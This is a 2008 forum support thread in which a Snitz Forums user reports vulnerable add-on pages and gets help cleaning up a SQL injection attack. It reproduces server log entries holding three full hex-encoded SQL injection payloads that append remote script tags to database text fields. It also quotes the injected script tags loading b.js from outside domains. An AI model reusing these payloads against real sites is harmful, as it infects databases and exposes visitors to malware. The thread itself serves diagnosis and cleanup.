Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 Community Forums
 Community Discussions (All other subjects)
 Vulnerable MOD Pages ...
 New Topic  Reply to Topic
 Printer Friendly
Author Previous Topic Topic Next Topic  

richfed
Average Member

United States
999 Posts

Posted - 28 June 2008 :  07:10:41  Show Profile  Visit richfed's Homepage  Reply with Quote
At least according to my web host:

We have scanned your site for vulnerability and found the following pages which are vulnerable..

/messageboard/avatar_legend.asp

/messageboard/guestbook.asp

/messageboard/myowngoogle.asp

/messageboard/Photo_Album_view.asp

/messageboard/pop_report.asp


Hope that may help some of you out there.

PS - Not sure where the best place is to post this. Move as appropriate!!<

leatherlips
Senior Member

USA
1838 Posts

Posted - 28 June 2008 :  07:29:08  Show Profile  Visit leatherlips's Homepage  Reply with Quote
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.<

Mangione Magic Forum - The Music of Chuck Mangione

My Mods: Googiespell MOD | Link To Reply MOD | Petition MOD | Contact Page MOD | Share This Topic MOD | MP3 MOD | PageEar MOD | Google Viewer MOD
Go to Top of Page

modifichicci
Average Member

Italy
787 Posts

Posted - 28 June 2008 :  08:08:24  Show Profile  Visit modifichicci's Homepage  Reply with Quote
I think in Photo_album_view we have to sanitize these variables:
strPhotoName = trim(request.QueryString("PhotoName"))
strDescription = trim(request.QueryString("Description"))
strPhotoSearch = trim(request.QueryString("Photo_Search"))

I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so i don't know if a sqlstring it's enought or not.
There is a validate input function in inc photo functions but at this moment I don't know how to use it..<

Ernia e Laparocele
Forum di Ernia e Laparocele
Acces - MySql Migration Tutorial
Adamantine forum
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20595 Posts

Posted - 28 June 2008 :  08:52:31  Show Profile  Visit HuwR's Homepage  Reply with Quote
I would be interested in why your host thinks all those files are vunerable, I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.

If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual succesful attempt.

obviously if they have some better evidence then fair enough<
Go to Top of Page

SiSL
Average Member

Turkey
671 Posts

Posted - 28 June 2008 :  09:01:20  Show Profile  Visit SiSL's Homepage  Reply with Quote
There is some SQL Injection checkers for hosts, that might be possible checking queryies...<

CHIP Online Forum

My Mods
Select All Code | Fix a vulnerability for your private messages | Avatar Categories W/ Avatar Gallery Mod | Complaint Manager
Admin Level Revisited | Merge Forums | No More Nested Quotes Mod
Go to Top of Page

richfed
Average Member

United States
999 Posts

Posted - 28 June 2008 :  10:00:19  Show Profile  Visit richfed's Homepage  Reply with Quote
quote:
Originally posted by leatherlips

What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.



I wish I could answer that! I'm hoping someone can ...

Meanwhile, my host sent this:

We can see few SQL injetion attempts in the logs through the asp script topic.asp



GET /messageboard/topic.asp

topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62696E3936332E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
 44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--

80 - 58.187.50.43 HTTP/1.1

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -

- www.mohicanpress.com


GET /messageboard/topic.asp

whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E61737073736C36332
E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E45585420
4
 6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C
4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4
37572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

80 - 200.90.76.104


GET /messageboard/topic.asp

TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E6170707338342E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
 44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--

80 - 190.39.125.85 HTTP/1.1

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -

- www.mohicanpress.com


These are found in the logs just before the first entry of the given pattern

The sql statements are encoded to Hexadecimal code ( start from: SET%20@S=CAST( . You can try to decode it using any online tools which converts Hexadecimal to string ).


If someone could make English out of this, there areprobably a few here who would be most grateful!!
<

Edited by - richfed on 28 June 2008 10:06:09
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 28 June 2008 :  11:10:07  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
That was just a hack attempt. Topic.asp is secure and it has been for as long as I can remember!<


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 28 June 2008 :  11:14:48  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
Rich, you need to fix your forum database, anyone who visits your forum is at get risk of getting virus infected. It's amazing that after a couple days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!

Please take the forum down until is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsability in that, too.<


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

richfed
Average Member

United States
999 Posts

Posted - 28 June 2008 :  12:06:56  Show Profile  Visit richfed's Homepage  Reply with Quote
Done, ruirib. I just contacted my host once again about running that script. Thanks -<

Rich
[size=1]A Complete Idiot's Guide to MOD Implementation || On the Trail of the Last of the Mohicans[/size=1]
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 28 June 2008 :  12:14:18  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
Do let them know that they will need to replace for the actual "infectious" link in the script, otherwise it won't have any effect.<


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

richfed
Average Member

United States
999 Posts

Posted - 28 June 2008 :  14:27:40  Show Profile  Visit richfed's Homepage  Reply with Quote
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out????? I remove it, it just pops back in. <
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 28 June 2008 :  14:51:47  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
Seems like they used several links. You will need to run the script once for each link, of course, changing the link in the script.<


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

richfed
Average Member

United States
999 Posts

Posted - 28 June 2008 :  15:42:24  Show Profile  Visit richfed's Homepage  Reply with Quote
Got it removed, finally. You da man, ruirib!! Thanks ...<
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 28 June 2008 :  15:47:55  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
You're welcome.<


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.16 seconds. Powered By: Snitz Forums 2000 Version 3.4.07